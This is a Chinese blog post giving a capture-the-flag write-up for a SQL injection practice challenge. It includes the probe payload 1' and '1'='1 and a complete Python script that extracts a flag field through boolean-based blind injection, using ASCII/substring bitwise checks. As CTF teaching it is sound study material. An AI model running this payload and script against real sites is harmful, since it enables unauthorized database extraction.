6.简单sql注入之3

py3study

发布于 2020-01-09 11:44:59

3200

发布于 2020-01-09 11:44:59

文章被收录于专栏：python3python3

进去输入1观察发现：

wKioL1lovzLgSL2-AABHlqiHUio047.png-wh_50

2,3都只有一个结果Hello！，我们输入4观察一下

发现空白，于是输入sql注入语句：1' and '1'='1

wKiom1lov8qw4mAOAABJGHwEveo306.png-wh_50

没有报错，也有显示Hello！于是判断出，该题目没有过滤，只能用基于Hello！回显的sql注入

猜测数据库，数据表，字段这些我就不浪费时间写了，有想要了解的道友，可以自行百度，或留言交流，我这里直接写爆破flag表flag字段的代码就好了

代码如下：

#!/usr/bin/python
#coding=utf-8
#Author = One

import requests

def main():
    n = 0
    binary = ""
    flag = ""
    for i in range(1,1000):
        for j in range(8):
            url = "http://ctf5.shiyanbar.com/web/index_3.php?id=1' and 1=if((ascii(substring((select flag from flag),"+str(i)+",1))%26"+str(2**j)+")="+str(2**j)+",1,0) %23"
            request = requests.get(url)
            if(request.text.find('Hello!') != -1):
                binary = '1'+binary
                n = 0
            else:
                binary = '0'+binary
                n += 1
        print chr(int(binary,2)),
        flag += chr(int(binary,2))
        binary = ""
        if(n >= 8):
            print "\n"+flag
            break
        
if __name__ == '__main__':
    main()
#上述代码使用的是按位与方法，比普通循环遍历所有可能字符要快，比较8次必得一个字符结果

即可爆破出结果：